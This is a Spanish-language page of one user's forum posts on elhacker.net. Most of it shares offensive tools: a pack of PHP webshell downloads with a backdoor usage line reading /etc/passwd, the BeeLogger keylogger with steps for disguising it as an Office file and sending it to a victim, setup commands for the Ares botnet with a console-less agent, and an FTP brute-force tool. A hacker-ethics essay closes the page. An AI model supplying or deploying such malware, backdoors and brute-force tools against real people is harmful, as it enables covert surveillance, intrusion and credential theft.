elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Usas Skype? Protégete de los Skype Resolver


  Mostrar Mensajes
Páginas: [1] 2
1  Programación / Desarrollo Web / WEBSHELLS | PHP | PACK en: 20 Marzo 2017, 19:42
Queria compartir estas webshells escritas en PHP

DOWNLOAD:C37 WEBSHELL


DOWNLOAD:BY-PASS WEBSHELL



DOWNLOAD: AK-74 SECURITY TEAM WEBSHELL


DOWNLOAD: PREDATOR WEBSHELL


DOWNLOAD: Dhanush
[/align]
USERNAME AND PASSWORD FROM PANEL: Dhanush

DOWNLOAD:SHANKAR WEBSHELL


DOWNLOAD:SIMPLE BACKDOOR

USAGE: simple-backdoor.php?cmd=cat+/etc/passwd

DOWNLOAD:C99 WEBSHELL

Web shell recommended :)

DOWNLOAD:LOSDC WEBSHELL

Web shell recommended :)

DOWNLOAD: PRIVATE SHELL

Web shell recommended :)

DOWNLOAD:SST SHELLER WEBSHELL


Espero que os puedan servir
Un saludo gente :)

MOD: Imagenes adaptadas a lo permitido. Links corregidos.
2  Seguridad Informática / Hacking Avanzado / BeeLogger|KEYLOGGER|PYTHON| en: 20 Marzo 2017, 19:27
Buenas gente queria compartir este keylogger escrito en python, es un keylogger muy sencillito, solo captura lo que la victima teclee, no capturara informacion ni sobre el ordenador ni sobre los navegadores ni nada, tan solo lo que tecleamos :)


Download: BeeLogger


Con la opcion "K" procederemos a crear el keylogger, basicamente podemos elegir que tipo sera,es decir, si nuestro keylogger simulara ser un archivo excel,un archivo en blanco, una presentacion power point etc..





solo se lo tendremos que enviar a la victima



Una vez que la victima lo ejecute,recibiremos los logs despues de pasar 120 segundos o cada 50 caracteres que escriba la victima, recomiendo probarlo :)

Un saludo chicos :)

MOD: Imagen adaptada a lo permitido. Link corregido.
3  Seguridad Informática / Hacking Avanzado / Re: Cain y Abel No puedo instalar en: 20 Marzo 2017, 19:17
Estimados estoy intentando instalar el software Cain y Abel, ya lo descargue pero cuando lo eejecuto me sale el mensaje Could not Initializa Installation. File size expect=8244106, size returned=3916138.
Tengo Windows 7 Professional.
Ya instale como administrador del equipo y con todas las formas de compatibilidad que existen y sigo teniendo ese error.
Muchas gracias por las respuestas
El programa lo baje de la página Oficial

[MOD] No está permitido duplicar post simultaneamente en dos subforos, el otro ha sido eliminado.


Olvida Cain, si quieres realizar ataques MITM, DNS spoofing y demas ataque en LAN, te recomiendo que utilizas bettercap :) un saludo
4  Seguridad Informática / Hacking Avanzado / Re: ¿El SslStrip sigue funcionando? en: 14 Enero 2017, 12:21
bettercap y mitm-framework yo creo que son los dos mejores
5  Seguridad Informática / Análisis y Diseño de Malware / Ares-Botnet en python en: 30 Diciembre 2016, 00:48
Buenas gente os queria compartir aqui al amigo Ares :)

Descripcion

Ares es una herramienta de acceso remoto compuesta por un panel de control donde podremos interaccionar con los bots.
El cliente es un programa escrito en python el cual puede ser compilado como un ejecutable win32 usando PyInstaller.

Instalacion

Código:
git clone https://github.com/sweetsoftware/Ares
Una vez descargado el repositorio pasaremos a instalar las dependecias
Citar
pip install pythoncom
pip install pyhook
pip install PIL
pip install requests

A continuacion configuraremos el agente de la manera que queramos, settings.py
Nos dirigimos a la ruta Ares/agent/python/settings.py

configurando

Este fichero contiene lo siguiente:

-SERVER_URL = URL del servidor http
-BOT_ID = el nombre (singular) del bot
-DEBUG =  imprimir mensajes de depuración en la salida estándar
-Idle_time = tiempo de inactividad antes de entrar en el modo de espera.
-REQUEST_INTERVAL = intervalo entre cada consulta a la CNC cuando se activa
-PAUSE_AT_START = tiempo de espera antes de contactar con el servidor cuando se inicie (en segundos)
-AUTO_PERSIST = por defecto el agente es persistente

fichero de configuracion del server

Una vez todo en orden pasaremos a instalar el server, primero debemos crear la base de datos SQLite

Código:
cd server
python db_init.py

Si no esta instalado el paquete cherrypy deberemos instalarlo
Código:
pip install cherrypy
Bien, a continuacion iniciaremos el server, python server.py
Por defecto el servidor escucha en http://localhost:8080

Por ultimo utlizaremos PyInstaller para compilar el agente en un unico archivo EXE:

Código:
cd agent
PyInstaller --onefile --noconsole agent.py

Recuerden que deberemos iniciar el server y la bbdd antes de lanzar el script.
Aqui deberemos establecer un pass para el CP :)


Mediante el fichero agent.py conseguiremos el bot, yo lo que he hecho ha sido ejecutarlo desde la consola

Panel de Control

Nos da una shell, no es muy molona pero bueno :(




Un saludo  :)



6  Seguridad Informática / Hacking Avanzado / FTP Password Recovery en: 25 Diciembre 2016, 12:42
Buenas gente os queria compartir esta herramienta llamada FTP Password Recovery.

Descripcion

FTP Password Recovery es una herramienta en línea de comandos libre para encontrar la contraseña perdida u olvidada FTP para cualquier servidor FTP. (vamos para realizar ataques de FB)
Detecta automáticamente si el servidor FTP de destino permite que cualquier Anónimo (sin contraseña). En caso de que el servidor FTP se ese ejecutando en un puerto diferente que no sea el puerto 21, entonces se puede especificar fácilmente el mismo en la herramienta junto con la dirección IP del servidor. 

Caracteristicas

-Herramienta gratuita para recuperar la contraseña perdida u olvidada FTP (para realizar ataques FB)
-Tiene una opción para especificar el puerto FTP no estándar
-Detecta automáticamente cualquier usuario anónimo
-Incluye un diccionario de las contraseñas que tienen los FTP mas comunes
-Copia el recuperado contraseña FTP al portapapeles
-Incluye instalador para la instalación y desinstalación local

Instalacion

-Descargaremos la herramienta aqui (abajo Download FTP Password Recovery)
-Una vez que tengamos descargado el zip nos dirigimos a la carpeta y ejecutamos en la consola Setup_FTPPaswordRecovery.exe , se nos abrira el instalador de la herramienta, tan solo tendremos que seleccionar la ruta de donde la queremos instalar y listo

Uso

Es muy facil de usar, con la opcion:
-i elegiremos la IP
-p especificaremos el puerto
-u el usuario
-f la ruta de nuestro diccionario

probando la herramienta en un ftp mio

resultado

Espero que os haya gustado

Un saludo biaaachees :)

7  Foros Generales / Foro Libre / Re: Filosifa Hacker desde la opinion de un user(recomendable) en: 23 Noviembre 2016, 20:38
estoy totalmente de acuerdo para mi un ejemplo de cracker es quien consigue saltarse por ejemplo el codigo de una lincencia mediante la ingenieria inversa,y obviamente entendiendo todo lo que hace,quizas se haya expresado mal ahi,pero el resto de lo que dice yo estoy de acuerdo con lo que dice
8  Seguridad Informática / Seguridad / Re: Ayuda con nmap! en: 23 Noviembre 2016, 18:38
Yo te recomiendo que hagas primero un ip route obtendras las red por ejemplo 192.168.4.0/24...luego tira nmap -sV -A 192.168.4.0/24....y mira a ver si la cosa cambia :)
9  Foros Generales / Foro Libre / Re: Filosifa Hacker desde la opinion de un user(recomendable) en: 23 Noviembre 2016, 17:09
Deberías colocar la fuente de donde sacaste la info.

Saludos!

Modificado :)
10  Foros Generales / Foro Libre / Filosifa Hacker desde la opinion de un user(recomendable) en: 23 Noviembre 2016, 13:53
Queria compartir con vosotros la opinion de un usuario de miembro del foro de Underc0de, os recomiendo la lectura,ami personalmente me ha gustado mucho


LA CONDENA SOCIAL:
Una vez un amigo me dijo: “Me da miedo que sepas tanto sobre informática, me da miedo que te metas en mi ordenador, en mi casilla de correo electrónico y en mi Facebook”. Pasé mucho tiempo reflexionando sobre el significado de esas palabras. Finalmente pude ver la luz y me di cuenta de algo que cambió mi forma de pensar: “Para el común de los mortales, un hacker es un delincuente”.

Asombrado por este descubrimiento, comencé a tratar de descubrir la raíz de estos (errados) preconceptos. De esta forma, me di cuenta que el problema más grave no es que se le llame delincuente a un hacker, sino, y por el contrario, que se le llame hacker a un delincuente.

LA ETICA DEL HACKER:

De la misma forma que un cerrajero, basado en años de estudio, trabajo y experiencia, conoce la forma de abrir cualquier cerradura, (lo que supondría un riesgo de seguridad enorme para la sociedad), un hacker también conoce formas y métodos de vulnerar y abrir las cerraduras electrónicas. Es en este estadio en donde entra en juego la famosa “Ética Hacker”.

Haciendo uso de sus conocimientos adquiridos a priori, el cerrajero podría tranquilamente deambular por la ciudad por las noches, mientras todo el mundo duerme, abriendo las puertas de las casas y realizando hurtos. En tal caso, ya no sería un simple cerrajero, sino que se convertiría en un delincuente. En nuestro mundo de unos y ceros pasa lo mismo. Un hacker tranquilamente podría dedicarse a vulnerar empresas, personas, entidades haciendo uso de los conocimientos que posee sobre muchas y variadas ramas de las ciencias computacionales, pero de ser así, estaríamos hablando nuevamente de un delincuente, digital, pero delincuente al fin.

Para referirse a tales delincuentes, y así diferenciarlos de los verdaderos hackers, el filósofo finlandés Pekka Himanen, acuñó la palabra “Cracker” en su obra: “La ética del hacker y el espíritu de la era de la información”. También señaló que el término hacker no debe ser utilizado única y exclusivamente dentro del mundo tecnológico, sino abrir sus horizontes hacia otros ambientes:

“En el centro de nuestra era tecnológica se hallan unas personas que se autodenominan hackers. Se definen a sí mismos como personas que se dedican a programar de manera apasionada y creen que es un deber para ellos compartir la información y elaborar software gratuito. No hay que confundirlos con los crackers, los usuarios destructivos cuyo objetivo es el de crear virus e introducirse en otros sistemas: un hacker es un experto o un entusiasta de cualquier tipo que puede dedicarse o no a la informática.”

A finales de los años 50’s, cuando todo lo que tenemos hoy en materia informática y de telecomunicaciones, estaba aún en pañales, cierto grupo de gente, en los laboratorios de inteligencia artificial del MIT, empezaron a debatir sobre los principios éticos y morales a los que, teóricamente, debería responder todo este mundillo que de a poco iba naciendo. El periodista Steven Levy en su ensayo: “Hackers: Héroes de la revolución computacional”, publicado en 1984, describe ilustradamente cómo era el ambiente por aquel entonces. También enumera los principios morales antes mencionados. Entre ellos se habla de pasión, libertad, conciencia social, transparencia de la información, libre acceso a la misma, curiosidad, creatividad e interés.

LOS HACKERS EXISTEN Y ESTÁN PARA AYUDARTE:

Si tienes la suerte de conocer un hacker, descubrirás por ti mismo que, sin dudas, es una persona extraña. Probablemente retraída y de aspecto desprolijo. Claro que no existe un estereotipo de hacker, pero me baso en mi experiencia en hackmeetings (reuniones de hackers) para describirlos a grandes rasgos. No te asustes ni te intimides, suelen ser amistosos. Si tienes la posibilidad, acércate, comunícate, pregúntale cosas, pregúntale qué significa el hacking para él, por qué lo hace, cuánto tiempo lleva en esto, seguramente te sorprenderá más de una respuesta.

Los hacker están ahí, pero no para atacarnos y hacerse con nuestro perfil de Facebook, como muchos creen, sino para cuidarnos de los delincuentes que deambulan por la red de redes. Lo único que ellos necesitan de nosotros, es que cambiemos los conceptos que tenemos en nuestra mente y que los medios de comunicación, que de esto no saben nada, se implican en exponerlos como válidos y verdaderos día a día.

Un hacker no es un delincuente y un delincuente no es un hacker. Teniendo esto bien en claro, podremos discernir entre lo verdadero y lo falso cuando leamos en un diario o veamos en un noticiero un titular como “Hacker robó x cantidad de dinero de tal banco” o “Grupo de hackers se hacen con el control de más de 1000 cuentas de redes sociales”.  De hecho, las noticias de los verdaderos hackers raramente las verán en un noticiero. ¿Alguna vez vieron en algún medio una noticia del estilo: “Hackers desarrollan un nuevo algoritmo de cifrado para comunicaciones inalámbricas en remplazo del antiguo y vulnerado WEP”?

Si logramos cambiar y ordenar los conceptos que tenemos sobre ciber delincuencia y hacking ético, podremos observar de un modo nuevo y diferente a internet y al mundo de las comunicaciones digitales. Underc0de y quienes lo integran, confian y apoyan el hacking ético. Nos hemos propuesto educar al respecto tanto a los más nuevos, como a todo aquel que quiera comprender cómo funciona el underground digital. Nuestros tutoriales, cursos, competencias, artículos, recursos y servicios, están 100% orientados a suscitar la libertad de espíritu y de pensamiento en todo aquel que quiera un mundo digital libre, seguro y con información accesible para todos. A su vez, Underc0de y quienes lo hacemos posible día a día, condenamos el ciber crimen, la delincuencia digital en cualquiera de sus formas y rostros y toda actividad ilícita que de una u otra manera afecte a la integridad de un tercero sea esta física o digital y este sea persona física o entidad.

AUTOR:CrazyKade

PD:no es por hacer spam pero es que me ha parecido oportuno compartilo aqui y lo compartire en otros sitios para que la gente lo lea sobretodo la gente que se esta iniciando y ansia jakiar un feisbuk...

fuente:underc0de.org

Un saludo :)
Páginas: [1] 2
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines